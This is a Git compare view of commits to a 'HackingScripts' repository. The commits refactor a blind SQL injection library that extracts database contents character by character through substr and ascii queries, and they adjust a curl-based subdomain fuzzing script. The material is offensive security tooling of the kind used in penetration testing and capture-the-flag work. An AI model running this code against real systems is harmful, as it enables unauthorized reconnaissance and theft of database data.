Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Roman:50750f5463375a1eb823142a8cb8f86c354fa4bb
Branches Tags
Roman:master
...
compare: Roman:58329993e2aaea7583dcc1f7d328dec3d2a40d85
Branches Tags
Roman:master

3 Commits
50750f5463 ... 58329993e2

Author SHA1 Message Date
Roman Hergenreder
58329993e2 SQLi improvement 2025-12-08 14:34:23 +01:00
Roman Hergenreder
6b807eb828 SQLi: custom substr method 2025-12-08 14:34:23 +01:00
Roman Hergenreder
7088f50fa0 Subdomain Fuzz: static IP 2025-12-08 14:34:23 +01:00
2 changed files with 30 additions and 30 deletions
Expand all files Collapse all files

34
sqli.py
View File

@@ -6,12 +6,13 @@ class SQLi(ABC):
@staticmethod @staticmethod
def build_query(column: str|list, table=None, condition=None, offset=None, limit=1): def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
column = column if isinstance(column, str) else ",".join(column) query = "SELECT "
condition = "" if not condition else f" WHERE {condition}" query += column if isinstance(column, str) else ",".join(column)
offset = "" if offset is None else f" OFFSET {offset}" query += "" if not table else f" FROM {table}"
table = "" if not table else f" FROM {table}" query += "" if not condition else f" WHERE {condition}"
limit = "" if limit is None else f" LIMIT {limit}" query += "" if limit is None else f" LIMIT {limit}"
return f"SELECT {column}{table}{condition}{limit}{offset}" query += "" if offset is None or limit is None else f" OFFSET {offset}"
return query
def extract_multiple_ints(self, column: str, table=None, condition=None, verbose=False): def extract_multiple_ints(self, column: str, table=None, condition=None, verbose=False):
row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose) row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
@@ -35,9 +36,11 @@ class SQLi(ABC):
return rows return rows
@abstractmethod def substring(self, what, offset: int, size: int):
def ascii(self): return f"substr({what},{offset},{size})"
pass
def ascii(self, what):
return f"ascii({what})"
@abstractmethod @abstractmethod
def extract_int(self, column: str, table=None, condition=None, def extract_int(self, column: str, table=None, condition=None,
@@ -207,7 +210,7 @@ class BlindSQLi(SQLi, ABC):
cur_str = "" cur_str = ""
while True: while True:
found = False found = False
cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))" cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
if charset: if charset:
query = self.build_query(cur_column, table, condition, offset) query = self.build_query(cur_column, table, condition, offset)
for c in charset: for c in charset:
@@ -255,9 +258,6 @@ class PostgreSQLi(SQLi, ABC):
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class MySQLi(SQLi, ABC): class MySQLi(SQLi, ABC):
def get_database_version(self, verbose=False): def get_database_version(self, verbose=False):
return self.extract_string("VERSION()", verbose=verbose) return self.extract_string("VERSION()", verbose=verbose)
@@ -277,10 +277,6 @@ class MySQLi(SQLi, ABC):
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class SQLitei(SQLi, ABC): class SQLitei(SQLi, ABC):
def get_database_version(self, verbose=False): def get_database_version(self, verbose=False):
return self.extract_string("sqlite_version()", verbose=verbose) return self.extract_string("sqlite_version()", verbose=verbose)
@@ -299,5 +295,5 @@ class SQLitei(SQLi, ABC):
# TODO: we could query the "sql" column and parse it using regex # TODO: we could query the "sql" column and parse it using regex
raise Exception("Not implemented!") raise Exception("Not implemented!")
def ascii(self): def ascii(self, what):
return "unicode" return f"unicode({what})"

12
subdomainFuzz.sh
View File

@@ -14,7 +14,7 @@ fi
DOMAIN=$(echo $DOMAIN | sed -e 's|^[^/]*//||' -e 's|/.*$||') DOMAIN=$(echo $DOMAIN | sed -e 's|^[^/]*//||' -e 's|/.*$||')
if [ $# -lt 2 ]; then
echo "[ ] Resolving IP-Address…" echo "[ ] Resolving IP-Address…"
output=$(resolveip $DOMAIN 2>&1) output=$(resolveip $DOMAIN 2>&1)
status=$(echo $?) status=$(echo $?)
@@ -22,6 +22,12 @@ if ! [[ $status == 0 ]] ; then
echo "[-] ${output}" echo "[-] ${output}"
exit exit
fi fi
IP_ADDRESS=$(echo $output | head -n 1 | awk '{print $NF}')
echo "[+] IP-Address: ${IP_ADDRESS}"
else
IP_ADDRESS=$2
echo "[+] Using IP-Address: ${IP_ADDRESS}"
fi
function sni () { function sni () {
protocol=$1 protocol=$1
@@ -37,14 +43,12 @@ function sni () {
echo $sni echo $sni
} }
IP_ADDRESS=$(echo $output | head -n 1 | awk '{print $NF}')
echo "[+] IP-Address: ${IP_ADDRESS}"
echo "[ ] Retrieving default site…" echo "[ ] Retrieving default site…"
rnd=$(uuidgen) rnd=$(uuidgen)
sni=$(sni ${PROTOCOL} ${rnd}.${DOMAIN}) sni=$(sni ${PROTOCOL} ${rnd}.${DOMAIN})
charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
charcountIpAddress=$(curl -s "${PROTOCOL}://${IP_ADDRESS}" -k -m 5 | wc -m) charcountIpAddress=$(curl -s "${PROTOCOL}://${IP_ADDRESS}" -k -m 5 | wc -m)
charcountNonExistent=$(curl -s "${PROTOCOL}://${rnd}.${DOMAIN}" --resolve "${sni}:${IP_ADDRESS}" -k -m 5 | wc -m) charcountNonExistent=$(curl -s "${PROTOCOL}://${rnd}.${DOMAIN}" --resolve "${sni}:${IP_ADDRESS}" -k -m 5 | wc -m)
charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}" echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
echo "[ ] Fuzzing…" echo "[ ] Fuzzing…"